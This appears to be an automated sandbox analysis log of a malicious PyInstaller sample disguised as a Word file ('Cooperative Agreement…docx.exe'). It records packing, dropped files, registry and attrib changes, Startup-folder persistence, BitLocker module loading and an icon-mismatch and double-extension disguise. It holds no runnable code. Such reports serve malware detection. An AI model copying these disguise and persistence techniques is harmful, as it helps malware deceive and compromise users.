0_2_0040A756

Source: _ctypes.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x16009
Source: _sqlite3.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x15dfb
Source: _lzma.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x22ff2
Source: libssl-3.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0x4330c
Source: _bz2.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x1bdb0
Source: select.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0xa27a
Source: unicodedata.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x4e672
Source: libcrypto-3.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0x197f77
Source: _hashlib.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0xcc8b
Source: _decimal.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x2a089
Source: _socket.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x196aa
Source: _queue.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x11a1d
Source: libffi-8.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.16.dr	Static PE information: real checksum: 0x0 should be: 0x1ee96
Source: python312.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0x1c0022
Source: sqlite3.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0xa890d
Source: chost.exe.4.dr	Static PE information: real checksum: 0x840198 should be: 0x847fd9
Source: Cooperative Agreement0000800380.docx.exe	Static PE information: real checksum: 0x0 should be: 0x1dfaf
Source: 4z11l1tq.dll.80.dr	Static PE information: real checksum: 0x0 should be: 0xd34a

Source: Cooperative Agreement0000800380.docx.exe	Static PE information: section name: .code
Source: VCRUNTIME140.dll.16.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.16.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.16.dr	Static PE information: section name: UPX2

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE49327 push rsp; ret	17_2_00007FFDEAE49328
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE482D8 push rdi; iretd	17_2_00007FFDEAE482DA
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45C31 push r10; ret	17_2_00007FFDEAE45C33
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE48419 push r10; retf	17_2_00007FFDEAE48485
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE4808B push r12; iretd	17_2_00007FFDEAE4809F
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45F56 push r12; ret	17_2_00007FFDEAE45F73
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE48F42 push rsp; iretq	17_2_00007FFDEAE48F43
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45F01 push r12; ret	17_2_00007FFDEAE45F10
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45EB4 push rsp; iretd	17_2_00007FFDEAE45EB5
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE49686 push rdx; ret	17_2_00007FFDEAE496DD
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE47689 push r12; ret	17_2_00007FFDEAE476CD
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45E67 push rdi; iretd	17_2_00007FFDEAE45E69
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE46859 push rsi; ret	17_2_00007FFDEAE46890
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE47FFF push r12; ret	17_2_00007FFDEAE4804A
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45FB9 push r10; ret	17_2_00007FFDEAE45FCC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45F7B push r8; ret	17_2_00007FFDEAE45F83
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE47F67 push rbp; iretq	17_2_00007FFDEAE47F68
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45D06 push r12; ret	17_2_00007FFDEAE45D08
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45CED push rdx; ret	17_2_00007FFDEAE45CF7
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45CE0 push r10; retf	17_2_00007FFDEAE45CE2
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45CE5 push r8; ret	17_2_00007FFDEAE45CEB
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE494B9 push rsp; retf	17_2_00007FFDEAE494BA
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE4763E push rbp; retf	17_2_00007FFDEAE47657
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45E18 push rsp; ret	17_2_00007FFDEAE45E1C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE45DF7 push r10; retf	17_2_00007FFDEAE45DFA
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE48DBF push rsp; retf	17_2_00007FFDEAE48DC0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A64331 push rcx; ret	17_2_00007FFDF6A64332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD9376D2A5 pushad ; iretd	25_2_00007FFD9376D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD9388BCD2 push E85B7CD5h; ret	25_2_00007FFD9388BCF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 79_2_00007FFD96386329 push ecx; ret	79_2_00007FFD9638632C

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Process created: chost.exe

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\python312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\chost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\chost.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chost.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (85).png

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.exe

Static PE information: Cooperative Agreement0000800380.docx.exe

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 16_2_00007FF6943676B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

16_2_00007FF6943676B0

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
